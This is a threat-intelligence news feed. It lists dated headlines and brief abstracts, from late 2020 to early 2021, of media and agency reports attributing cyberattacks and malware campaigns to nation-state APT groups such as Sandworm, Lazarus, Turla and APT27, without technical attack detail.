The cybersecurity agency of France has recently affirmed that a group of Russian military hackers, acknowledged as the Sandworm group, was behind...Cyber Security News
February 15, 2021
France agency ANSSI links Russia’s Sandworm APT to attacks on hosting providers Full Text
Abstract
French agency ANSSI attributes a series of attacks targeting Centreon servers to the Russia-linked Sandworm APT group. The French security agency ANSSI is warming of a series of attacks targeting Centreon monitoring software used by multiple French...Security Affairs
February 11, 2021
Experts spotted two Android spyware used by Indian APT Confucius Full Text
Abstract
Lookout researchers provided details about two Android spyware families employed by an APT group tracked as Confucius. Researchers at mobile security firm Lookout have provided details about two recently discovered Android spyware families, dubbed...Security Affairs
February 11, 2021
Most Sophisticated BendyBear APT Malware Linked With Chinese Hacking Group BlackTech Full Text
Abstract
During a core investigation, the Unit 42 researchers have discovered a new polymorphic and "highly sophisticated" and well-engineered malware that is named...Cyber Security News
February 09, 2021
New BendyBear APT malware gets linked to Chinese hacking group Full Text
Abstract
Unit 42 researchers today have shared info on a new polymorphic and "highly sophisticated" malware dubbed BendyBear, linked to a hacking group with known ties to the Chinese government.BleepingComputer
February 8, 2021
Domestic Kitten has been conducting surveillance targeting over 1,000 individuals Full Text
Abstract
Iran-linked APT group Domestic Kitten, also tracked as APT-C-50, has been conducting widespread surveillance targeting over 1,000 individuals. Domestic Kitten, also tracked as APT-C-50, is an Iran-linked APT group that has been active at least since...Security Affairs
February 8, 2021
Domestic Kitten hacking group strikes local citizens considered a threat to Iranian regime Full Text
Abstract
Domestic Kitten has been conducting widespread surveillance for the past four years, launching at least 10 separate campaigns and maintaining a target list of 1,200 individuals, at a minimum.ZDNet
February 2, 2021
Lebanese Cedar APT group Attack ISP Companies Worldwide Full Text
Abstract
Recently, the Clearsky researchers have joined the Lebanese Cedar group in a cyber espionage campaign that has targeted several companies worldwide. According...Cyber Security News
February 1, 2021
Hezbollah-Linked Lebanese Cedar APT Infiltrates Hundreds of Servers Full Text
Abstract
Enhanced Explosive RAT and Caterpillar tools are at the forefront of a global espionage campaign.Threatpost
January 29, 2021
Lebanese APT group with suspected links to Hezbollah breached 250 servers worldwide Full Text
Abstract
Some 250 servers were apparently breached by the Lebanese Cedar APT group, an organization with suspected links to the Hezbollah Cyber Unit in Lebanon. The target victims include companies from many countries, including the United States, United Kingdom, Saudi Arabia, Egypt, Jordan, Lebanon, Israel and the Palestinian Authority. Many more companies and organizations have been…SCMagazine
January 29, 2021
Microsoft: North Korea-linked Zinc APT targets security experts Full Text
Abstract
Microsoft, like Google TAG, observed a cyber espionage campaign aimed at vulnerability researchers that attributed to North Korea-linked Zinc APT group. Researchers from Microsoft monitored a cyber espionage campaign aimed at vulnerability researchers...Security Affairs
January 28, 2021
Lebanese Cedar APT group broke into telco and ISPs worldwide Full Text
Abstract
Clearsky researchers linked the Lebanese Cedar APT group to a cyber espionage campaign that targeted companies around the world. Clearsky researchers linked the Lebanese Cedar group (aka Volatile Cedar) to a cyber espionage campaign that targeted...Security Affairs
January 15, 2021
What are Chinese APT Groups Up to? Full Text
Abstract
In the wake of several recent attacks, the adoption of ransomware tactics points to the fact that these APT groups are aiming for financial gains as these attacks don’t count as espionage targets.Cyware Alerts - Hacker News
January 12, 2021
BumbleBee Opens Exchange Servers in xHunt Spy Campaign Full Text
Abstract
The BumbleBee web shell allows APT attackers to upload and download files, and move laterally by running commands.Threatpost
January 12, 2021
Researchers Caught a North Korean Group Trying Out a New Hiding Trick Full Text
Abstract
North Korean APT37 group was found targeting the South Korean government in a new campaign using malware that finds its way through the memory of Microsoft Office.Cyware Alerts - Hacker News
January 11, 2021
Researchers see links between SolarWinds Sunburst malware and Russian Turla APT group Full Text
Abstract
While researchers may want to invest time and energy towards attributing the latest high-profile attack to a particular adversary, more productive is the ability to see similarities in the underlying techniques employed in the attack were to prior attacks.SCMagazine
January 11, 2021
Connecting the dots between SolarWinds and Russia-linked Turla APT Full Text
Abstract
Experts have found some similarities between the Sunburst backdoor used in the SolarWinds supply chain attack and Turla's backdoor Kazuar. Security experts from Kaspersky have identified multiple similarities between the Sunburst malware used in the SolarWinds...Security Affairs
January 11, 2021
SolarWinds Hack Potentially Linked to Turla APT Full Text
Abstract
Researchers have spotted notable code overlap between the Sunburst backdoor and a known Turla weapon.Threatpost
January 11, 2021
Sunburst backdoor shares features with Russian APT malware Full Text
Abstract
Kaspersky researchers found that the Sunburst backdoor, the malware deployed during the SolarWinds supply-chain attack, shows feature overlaps with Kazuar, a .NET backdoor tentatively linked to the Russian Turla hacking group.BleepingComputer
January 8, 2021
China-linked APT Groups Picking on Ransomware Attacks Full Text
Abstract
Security researchers shed a light on an investigation report involving financially-motivated ransomware actors from China targeting multiple companies.Cyware Alerts - Hacker News
January 7, 2021
North Korea-linked APT37 targets South with RokRat Trojan Full Text
Abstract
Experts spotted the RokRat Trojan being used by North Korea-linked threat actors in attacks aimed at the South Korean government. On December 7 2020 researchers from Malwarebytes uncovered a campaign targeting the South Korean government with a variant...Security Affairs
January 6, 2021
Hacker-for-Hire StrongPity APT Going Global with its New Infrastructure Full Text
Abstract
Experts reveal the StrongPity APT group could have links with state-sponsored campaigns with the ability to search and exfiltrate multiple files or documents from the victim’s machine.Cyware Alerts - Hacker News
January 5, 2021
Chinese APT Group Linked to Ransomware Attacks Full Text
Abstract
APT27 pegged for financially motivated raidsInfosecurity Magazine
January 5, 2021
Experts linked ransomware attacks to China-linked APT27 Full Text
Abstract
Researchers from security firms Profero and Security Joes linked a series of ransomware attacks to the China-linked APT27 group. Security researchers from security firms Profero and Security Joes investigated a series of ransomware attacks against...Security Affairs
January 04, 2021
China’s APT hackers move to ransomware attacks Full Text
Abstract
Security researchers investigating a set of ransomware incidents at multiple companies discovered malware indicating that the attacks may be the work of a hacker group believed to operate on behalf of China.BleepingComputer
January 4, 2021
StrongPity APT Extends CyberAttack WorldWide with it’s New Infrastructure Full Text
Abstract
StrongPity or Promethium APT, also referred to as APT-C-41, has been active since 2012. It had been first publicly reported in October...Cyber Security News
December 25, 2020
North Korea-linked Lazarus APT targets the COVID-19 research Full Text
Abstract
The North Korea-linked Lazarus APT group has recently launched cyberattacks against at least two organizations involved in COVID-19 research. The North Korea-linked APT group Lazarus has recently launched cyberattacks against two entities involved...Security Affairs
December 23, 2020
Now Fox Kitten APT Deploys Pay2Key Ransomware to Create Panic Full Text
Abstract
The Iranian-backed Fox Kitten hacking group is suspected to be behind the nefarious acts of Pay2Key ransomware that began a new wave of attacks in November-December 2020.Cyware Alerts - Hacker News
December 19, 2020
How the Russian hacking group Cozy Bear, suspected in the SolarWinds breach, plays the long game Full Text
Abstract
As U.S. government agencies and thousands of companies around the world assess whether they’ve been compromised in the SolarWinds breach, security experts are concerned that the full reach of the suspected hackers may only be just coming to light.Cyberscoop
December 17, 2020
CISA: APT group behind US govt hacks used multiple access vectors Full Text
Abstract
The US Cybersecurity and Infrastructure Security Agency (CISA) said that the APT group behind the recent compromise campaign targeting US government agencies used more than one initial access vector.BleepingComputer
December 16, 2020
SideWinder APT: Active and Targeting South-Asian Countries Full Text
Abstract
SideWinder was observed using credential phishing pages copied from their victims’ webmail login pages and modified for phishing targets based in South Asian countries.Cyware Alerts - Hacker News
December 16, 2020
Revisiting APT1 IoCs with DNS and Subdomain Intelligence Full Text
Abstract
Of the 88 domain names publicly attributed to APT1, 28 remain active in the Domain Name System as of 4 December 2020. Of the remaining 23 APT1 domain IoCs, 19 were cited as "malicious" by VirusTotal.CircleID
December 16, 2020
APT Group Targeting Governmental Agencies in East Asia - Avast Threat Labs Full Text
Abstract
The LuckyMouse APT group planted backdoors and keyloggers to gain long-term access to government networks and then uploaded a variety of tools that they used to perform additional activities.Avast
December 15, 2020
Chinese APT Groups Exploiting Corporate Software to Target Mongolian Organizations Full Text
Abstract
The operators behind Operation StealthyTrident have launched supply-chain attacks against hundreds of Mongolian government agencies by exploiting a legitimate software called Able Desktop.Cyware Alerts - Hacker News
December 11, 2020
Facebook unmasks Vietnam’s APT32 hacking group Full Text
Abstract
The Facebook security team has revealed today the real identity of APT32, a Vietnam-backed hacking group active in cyberespionage campaigns targeting foreign government, multi-national corporations, and journalists since at least 2014.BleepingComputer
December 10, 2020
MoleRats APT Returns with Espionage Play Using Facebook, Dropbox Full Text
Abstract
The threat group is increasing its espionage activity in light of the current political climate and recent events in the Middle East, with two new backdoors.Threatpost
December 08, 2020
FireEye Shares Details of Recent Cyber Attack, Actions to Protect Community Full Text
Abstract
FireEye is on the front lines defending companies and critical infrastructure globally from cyber threats. We witness the growing threat firsthand, and we know that cyber threats are always evolving. Recently, we were attacked by a highly sophisticated threat actor, one whose discipline, operational security, and techniques lead us to believe it was a state-sponsored attack. Our number one priority is working to strengthen the security of our customers and the broader community. We hope that by sharing the details of our investigation, the entire community will be better equipped to fight and defeat cyber attacks.December 01, 2020
Alert (AA20-336A) - Advanced Persistent Threat Actors Targeting U.S. Think Tanks Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have observed persistent continued cyber intrusions by advanced persistent threat (APT) actors targeting U.S. think tanks. This malicious activity is often, but not exclusively, directed at individuals and organizations that focus on international affairs or national security policy.[1] The following guidance may assist U.S. think tanks in developing network defense procedures to prevent or rapidly detect these attacks.November 30, 2020
Threat actor leverages coin miner techniques to stay under the radar – here’s how to spot them Full Text
Abstract
Cryptocurrency miners are typically associated with cybercriminal operations, not sophisticated nation state actor activity. They are not the most sophisticated type of threats, which also means that they are not among the most critical security issues that defenders address with urgency. Recent campaigns from the nation-state actor BISMUTH take advantage of the low-priority alerts coin miners cause to try and fly under the radar and establish persistence.October 30, 2020
Alert (AA20-334A) - Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data Full Text